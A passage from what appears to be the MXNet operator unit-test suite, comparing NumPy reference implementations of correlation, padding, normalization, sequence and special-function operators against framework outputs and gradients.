atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'].asnumpy(),
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1.simple_bind(default_context(),img1=img1.shape,img2=img1.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0].asnumpy(), forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'].asnumpy(), grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'].asnumpy(), grad2, rtol=1e-3, atol=1e-4)
@with_seed()
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
if arg_type1[0] != np.dtype(dtype) and arg_type1[1] != np.dtype(dtype) and out_type1[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from a is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
if arg_type2[0] != np.dtype(dtype) and arg_type2[1] != np.dtype(dtype) and out_type2[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from b is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
@with_seed()
def test_support_vector_machine_l1_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L, use_linear=True)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0].asnumpy())
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-1) * l_mask * np.greater(1 - l_mask * x_np, 0)
assert_almost_equal(grad_np, grad.asnumpy())
@with_seed()
def test_support_vector_machine_l2_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
x_np = x_np.astype(np.float32)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0].asnumpy())
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-2)*l_mask*np.maximum(1-l_mask*x_np,0)
grad_np = grad_np.astype(np.float32)
assert_almost_equal(grad_np, grad.asnumpy())
# Seed set because the test is not robust enough to operate on random data
@with_seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y.bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0].asnumpy()
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
@with_seed()
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y.bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0].asnumpy()
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
@with_seed()
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0] / s[1], axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out.simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
assert_almost_equal(exe.outputs[0].asnumpy(), np_out, rtol=1e-2 if dtype is 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
@with_seed()
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32, forward_check_eps=1E-3):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s.simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd.asnumpy(), forward_check_eps, forward_check_eps)
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
@with_seed()
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([4,5,6], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64}
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
print(order, dtype, i, out_dtype, in_shape)
in_data = np.random.uniform(-1, 1, in_shape).astype(acc_type[dtype])
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
npy_out = l1norm(in_data, i) if order is 1 else l2norm(in_data, i)
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx)
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
npy_out = l1norm(in_data, (i, i+1)) if order is 1 else l2norm(in_data, (i, i+1))
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-3 if dtype is np.float16 else 1e-3,
atol=1e-5 if dtype is np.float16 else 1e-5, ctx=ctx)
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
def test_layer_norm():
for dtype, forward_check_eps in zip([np.float16, np.float32, np.float64],
[1E-2, 1E-3, 1E-4]):
for in_shape in [(10, 6, 5), (10, 10)]:
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@with_seed()
@unittest.skip("Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
@with_seed()
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
@with_seed()
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data')
data2 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test.bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
arr_grad1 = arr_grad1.asnumpy()
arr_grad2 = arr_grad2.asnumpy()
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
arr_grad = arr_grad.asnumpy()
# print(name)
# print(arr_grad)
# print(npout_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
